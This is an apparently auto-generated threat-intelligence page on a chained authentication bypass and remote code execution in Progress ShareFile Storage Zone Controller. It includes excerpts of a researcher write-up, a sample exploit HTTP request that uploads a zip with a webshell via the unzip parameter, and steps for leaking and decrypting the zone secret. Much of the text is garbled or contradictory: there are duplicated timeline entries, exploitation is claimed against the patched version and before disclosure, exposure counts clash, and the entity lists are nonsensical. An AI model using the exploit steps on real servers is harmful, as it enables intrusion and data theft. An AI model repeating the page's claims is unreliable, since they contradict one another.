INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
Progress ShareFile Pre-Auth RCE Chain Vulnerability
2026-04-02 13:33 | CRITICAL HIGH
Executive Summary (AI-generated)
The ShadowServer Foundation has identified a critical vulnerability in Progress ShareFile, an enterprise-grade secure file transfer solution. The flaw allows attackers to chain two vulnerabilities - authentication bypass and remote code execution - to enable unauthenticated file exfiltration from affected environments. Researchers at offensive security company watchTowr discovered the issue in branch 5.x of Progress ShareFile, which has been addressed in version 5.12.4. This vulnerability can be exploited by attackers to gain pre-authentication access and execute malicious code on the server. The ShadowServer Foundation is aware of the potential threat and has taken steps to mitigate it, but its exact impact remains unclear due to the large number of affected Storage Zone Controller instances exposed on the public internet.
Technical Mitigations (AI-generated)
* Implement secure authentication and authorization mechanisms, such as multi-factor authentication (MFA) and role-based access control (RBAC), to prevent unauthorized access to the Storage Zones Controller (SZC) component.
* Regularly update and patch Progress ShareFile versions to ensure that known vulnerabilities are addressed before they can be exploited by threat actors.
* Monitor system logs and network traffic for suspicious activity, such as unusual file transfers or changes in storage zone configurations, which could indicate a Pre-Authenticated Remote Code Execution (Pre-ARC) attack.
* Conduct automated pentesting and vulnerability scanning of systems running vulnerable versions of Progress ShareFile Storage Zone Controller to identify potential entry points for attackers.
Technical Observables
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
CVE-2026-2701
CVE-2026-2699
Target & Sectors
Global Scope
Incident Timeline
February 2026
Threat actors used watchTowr's Python PoC to chain Authentication Bypass WT-2026-0006 and Remote Code Execution WT-2026-0007 attacks.
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
6th February 2026
watchTowr hunts across client attack surfaces for exposure
6th February 2026
Progress Security Team acknowledges receipt of disclosure for WT-2026-0006
13th February 2026
watchTowr discloses Remote Code Execution Vulnerability WT-2026-0007 to Progress Security Team.
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
6th February 2026
watchTowr discloses Authentication Bypass WT-2026-0006 to Progress Security Team.
14th February 2026
Threat actors used a pre-authentication Remote Code Execution (RCE) vulnerability in the ShareFile system to gain unauthorized access.
18th February 2026
Threat actors exploited a pre-authentication Remote Code Execution (RCE) vulnerability in the ShareFile system to gain unauthorized access.
February 18
Threat actors used a pre-auth RCE vulnerability in Progress ShareFile 5.12.4 to chain flaws discovered by watchTowr between February 6 and 13, with the full exploit confirmed on February 18.
watchTowr discovered the two flaws and reported them to Progress between February 6 and 13, and the full exploit chain was confirmed on February 18 for Progress ShareFile 5.12.4.
March 10, 2026
Threat actors exploited a pre-authentication Remote Code Execution (RCE) vulnerability in ShareFile's Progress share feature to gain unauthorized access.
These vulnerabilities were resolved in version 5.12.4, released to ShareFile customers on branch 5.x on March 10, 2026.
10th March 2026
Threat actors exploited a pre-authentication remote code execution vulnerability in the Storage Zone Controller 5.12.4 by chaining it with another known flaw to gain unauthorized access.
10th March 2026
watchTowr observes the release of Storage Zone Controller 5.12.4 and confirms it remediates the disclosed vulnerabilities.
March 10
Threat actors exploited vulnerabilities in Progress ShareFile 5.12.4 to target the software on March 10.
Following watchTowr's responsible disclosure, the problems have been addressed in Progress ShareFile 5.12.4, released on March 10.
The vendor released security updates in version 5.12.4, released on March 10.
April 02 2026
Threat actors used a vulnerability in the Tracker software to target an exploit for CVE-2026-2701 Remote Code Execution.
the tracker CVE-2026-2699 and requests an embargo until April 02 2026.
WT-2026-0007
Threat actors used a Python PoC to chain Authentication Bypass and Remote Code Execution vulnerabilities (CVE-2026-2701) in ShareFile, allowing for Pre-Authenticated Remote Code Execution.
It’s at this point that we have to highlight a caveat we observed with this functionality: it can only be executed if the server-side is authenticated with the ShareFile SaaS, which is pretty common, as this is a requirement for the Storage Zone Controller to work as intended.
WT-2026-0007 (CVE-2026-2701) - Post-Auth Remote Code Execution
Since we have shown that we can bypass authentication and modify the current ShareFile passphrase, we have one final step:
When you think about it, it should be a fairly easy task.
2026/04/02
Attackers can obtain remote code execution on the server by abusing file upload and extraction functionality to place malicious ASPX webshells in the application’s webroot.
The following represent industry-defining historical incidents:
Today, we find ourselves analyzing the journey we took to discover multiple vulnerabilities in Progress ShareFile, ultimately chained together to achieve Pre-Authenticated Remote Code Execution - and sharing more memes.
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version StorageCenter_5.12.3, which was the latest version at the time of writing.
Dissecting The ShareFile Storage Zone Controller
We set out with the goal of trying to achieve a complete compromise of a ShareFile Storage Zone Controller from a Pre-Authenticated perspective, that's right, today we’re talking about Remote Code Execution.
Two vulnerabilities in Progress ShareFile, an enterprise-grade secure file transfer solution, can be chained to enable unauthenticated file exfiltration from affected environments.
How the attack works
In a report today, watchTowr researchers explain that the attack begins by exploiting the authentication bypass issue, CVE-2026-2699, which gives access to the ShareFile admin interface due to improper handling of HTTP redirects.
In ShareFile’s own words:
ShareFile software gives you a structured, secure space to work with clients - share files, collect signatures, request data, and manage to-dos in one place, improving collaboration and the experience around it.
Functionality is presented to us that can be interacted with without authentication, but we’ll get to that.
The ShadowServer Foundation currently observes 700 internet-exposed instances of Progress ShareFile, most of which are located in the United States and Europe.
Such solutions are an attractive target for ransomware actors, as previously seen in Clop data-theft attacks exploiting bugs in Accellion FTA, SolarWinds Serv-U, Gladinet CentreStack, GoAnywhere MFT, MOVEit Transfer, and Cleo.
You’re Not Supposed To ShareFile With Everyone (Progress ShareFile Pre-Auth RCE Chain CVE-2026-2699 & CVE-2026-2701).
WT-2026-0006 (CVE-2026-2699) - Authentication Bypass Vulnerability
To start, we list out all of the .aspx files within the application and send requests to the server to observe the response.
Researchers at offensive security company watchTowr discovered an authentication bypass (CVE-2026-2699) and a remote code execution (CVE-2026-2701) in the Storage Zones Controller (SZC) component present in branch 5.x of Progress ShareFile.
Although we’d typically provide a DAG that leverages both identified weaknesses to produce comprehensive detection artifacts for your environment, ‘boilerplate’ validation of CVE-2026-2701 impacts the availability of targeted systems.
Routes such as REST endpoints defined within the web.config that is also backed by the DLL’s code
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
ShareFileFileId; // [2]
string text3 = ShareFile.
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Content-Type
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Microsoft
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Access-Control-Allow-Origin
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Login.aspx
When accessing the endpoint through a browser, you’re redirected via the Location header to authenticate via Login.aspx which 403’s as mentioned before (it's only for localhost access).
organisation
Response
In this particular instance, as ShareFile supplies the false flag:
The Response is a Status Code 302 redirecting to /ConfigService/Login.aspx?callerpage=Admin
The remaining functionality within the ConfigService.
organisation
ShareFiles
So it’s like SaaS in that you can authenticate and manage your files; actually, the data isn’t stored within ShareFiles infrastructure.
organisation
SMB
It can be configured to be hosted on the local file system, SMB servers, cloud bucket storage, etc.
organisation
Progress’s
To clarify, ShareFile has a cloud offering, which is their “SaaS”, this is Progress’s main interface and infrastructure for managing files.
organisation
ASMX
.NET applications such as this have a variety of ways in which interaction can be achieved, for example, with ShareFile, there are:
ASHX, ASMX, and ASPX extension files, which execute scripted code.
organisation
PHP
For those unfamiliar, a behavior that was neither common nor unheard of was present in PHP applications.
organisation
EAR
This is known as “CWE-698: Execution After Redirect (EAR)”.
organisation
EventArgs
protected void Page_Load(object sender, EventArgs e)
{
this._logger.
organisation
ActionHeader
ActionHeader = "Select ShareFile " + (Admin.isMultiTenant ?
organisation
ApplicationInstance
ApplicationInstance;
if (applicationInstance == null)
{
return;
}
applicationInstance.
organisation
Authentication Bypass
Onwards To RCE
Armed with our newly minted Authentication Bypass vulnerability, we charged on.
organisation
Storage Zone Controllers
This can be in various shapes and forms, including:
SharePoint
AWS S3 Buckets, Azure Storage Containers
SMB Servers
Local File System
From an external perspective, going through the flow of trying to “Create new Zone” presented errors that we were not able to overcome, so we quickly moved on from this function and looked at what was possible with “Join existing Zone”, which will be present in most, if not all, the exposed Storage Zone Controllers on the Internet.
organisation
Hostname
Hostname: Hostname of the installation
External Address: This is the Internet facing URL for which the ShareFile SaaS can reach the instance to sync configs, data etc
Storage Repository: The method in which the files for the ShareFile account are stored.
organisation
API/Rest
Passphrase
The password which is used to encrypt API/Rest endpoints of the current Zone Controller.
organisation
API
Initially, when creating a Zone, there is a need to utilize a Passphrase, this value is used to encrypt all API interactions with that particular Primary Zone Controller.
organisation
Passphrase
However, when making modifications to fields such as the Storage Repository or External Address etc, the value for the Passphrase is auto-populated by the server, rendering the need for this null and void.
organisation
Storage Zone Controller
To do this, we configured an independent malicious Storage Zone Controller to coerce our victim Controller to connect via the “Primary Zone Controller” field.
organisation
UNC
As the parameter called Network Share Location suggests, we suppose that one should provide the UNC path leading to the SMB share here.
organisation
StorageCenter
StorageCenter.
organisation
BusinessLogic
BusinessLogic.
organisation
GUID
This is because:
The file uploaded is renamed to some “random” key (name), like GUID.
organisation
ContentLength
ContentLength == 0L)
{
return Upload.ProcessZeroByteFile(fileControl.
organisation
UUID
Unfortunately, ShareFileFileId is an auto-generated UUID.
organisation
HttpMethod
HttpMethod == "OPTIONS")
{
base.
organisation
UploadLogic
NewGuid().ToString("n");
}
UploadLogic.
organisation
num2
= new Hashtable();
int num2 = 0;
bool flag = false;
if (requestKeys["unzip"] !
organisation
null &&
null && (requestKeys["unzip"] == "true" || requestKeys["unzip"] == "on")) //
organisation
InputFile
UnzipFiles(new InputFile
organisation
File7
File7, this.File8, this.
organisation
Network Share Location
If we set unzip parameter to true, the ZIP content will be extracted to some directory in the already modified Network Share Location (which we control).
organisation
PoC
Even though it looks simple at this point, a final PoC required some effort.
organisation
UI
This is because we couldn’t find a way to use this endpoint in the UI, so we had to craft the HTTP request from scratch.
organisation
HMAC-SHA256
You need to HMAC-SHA256 sign the /configservice/api/stroagezoneconfig string with the current ShareFile passphrase.
organisation
ZoneConfig
In a response, you will notice the TempData2:
{
"ZoneConfig":
{
"TempData2":"CbeqUAmHAbM7HuaDlAhgZ4N4dCC4u2zr/gOtQ6aySFgH7FU+21BiEZ5ZGw0WwMne",
"...":"..."
}
}
b) Decrypt Zone Secret
Our freshly leaked TempData2, is in fact base64 encoded and AES encrypted Zone Secret.
organisation
HMAC
In the last step, you can use the decrypted Zone Secret to calculate the HMAC-SHA256 for the upload request.
The researchers note that, for the exploit to work, attackers must generate valid HMAC signatures and extract and decrypt internal secrets.
organisation
DAG
We wouldn’t be ourselves if we didn’t provide you with both a Detection Artifact Generator (DAG) and a demo of the Detection Artifact Generator in action.
organisation
WatchTowr
Overview of the exploit chain
Source: WatchTowr
Impact and exposure
By watchTowr's scans, there are about 30,000 Storage Zone Controller instances exposed on the public internet.
organisation
New Progress
New Progress ShareFile flaws can be chained in pre-auth RCE attacks.
organisation
Progress
SZC gives customers more control over their data by allowing them to store it on their infrastructure (either on-prem or in a third-party cloud provider) or on the Progress systems.
WT-2026-0006
Threat actors used a Python PoC to chain Authentication Bypass WT-2026-0006 and Remote Code Execution WT-2026-0007 attacks in pre-auth RCE attacks.
tactic
Remote Code Execution
6th February 2026
watchTowr hunts across client attack surfaces for exposure
6th February 2026
Progress Security Team acknowledges receipt of disclosure for WT-2026-0006
13th February 2026
watchTowr discloses Remote Code Execution Vulnerability WT-2026-0007 to Progress Security Team.
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
tactic
T1059.006 - Python
organisation
Timeline
Date
Timeline
Date
Detail
6th February 2026
watchTowr discloses Authentication Bypass WT-2026-0006 to Progress Security Team.
2nd April 2026
Threat actors exploited vulnerabilities in ShareFile to launch pre-authentication Remote Code Execution (RCE) attacks.
Tactical Metrics
Metrics
infrastructure
12.3
Software Version
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version StorageCenter_5.12.3 which was the latest version at the time of writing.
Metrics
infrastructure
5.12.4
Software Version
These vulnerabilities were resolved in version 5.12.4, released to ShareFile customers on branch 5.x on March 10, 2026.
10th March 2026
watchTowr observes the release of Storage Zone Controller 5.12.4 and confirms it remediates the disclosed vulnerabilities.
Following watchTowr's responsible disclosure, the problems have been addressed in Progress ShareFile 5.12.4, released on March 10.
The vendor released security updates in version 5.12.4, released on March 10.
Metrics
data_breach
1
------Webkitformboundary7Ma4Ywxktrzu0Gw
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
ShareFileFileId; // [2]
string text3 = ShareFile.
Intelligence Sources
Zero Day Fans
2026-04-02
BleepingComputer
2026-04-02
New Progress ShareFile flaws can be chained in pre-auth RCE attacks
BleepingComputer
Incident Version History
CURRENT VERSION
Last Updated: 2026-04-27T12:01
Comprehensive Tactical Telemetry
Highly Correlated Entities
79x
organisation
Identified Entity
Functionality
entity
16x
timeline
Temporal Reference
March 10, 2026
date
4x
data breach
------Webkitformboundary7Ma4Ywxktrzu0Gw
1
------webkitformboundary7ma4ywxktrzu0gw
3x
tactic
Cyber Operation Type
Ransomware
tactic
3x
attribution
Attributing Entity
APT
authority
2x
vulnerability
Exploited CVE
CVE-2026-2699
cve
2x
infrastructure
Software Version
12.3
version
2x
general metric
Wt-2026
7
wt-2026
2x
tactic
MITRE ATT&CK Technique
T1584.004 - Server
technique
2x
general metric
Allow Headers
540
allow headers
Contextual Telemetry
Context Block
14 METRICS
source region
Origin Country
United States
country
data breach
Authentication Bypass Cve-2026 Remote Execution Sharefile
2,701
authentication bypass cve-2026 remote execution sharefile
general metric
Http Status Code
403
http status code
general metric
Http/1.1
302
http/1.1
general metric
Mon
23
mon
general metric
Remote Code Execution
2,701
remote code execution
general metric
=
0
=
general metric
Circa Instances
30,000
circa instances
general metric
Codes
401
codes
general metric
Entities
2
entities
general metric
Characters
10,000
characters
source region
Origin Region
EUROPE
region
general metric
Exposed Instances
700
exposed instances
general metric
February
13
february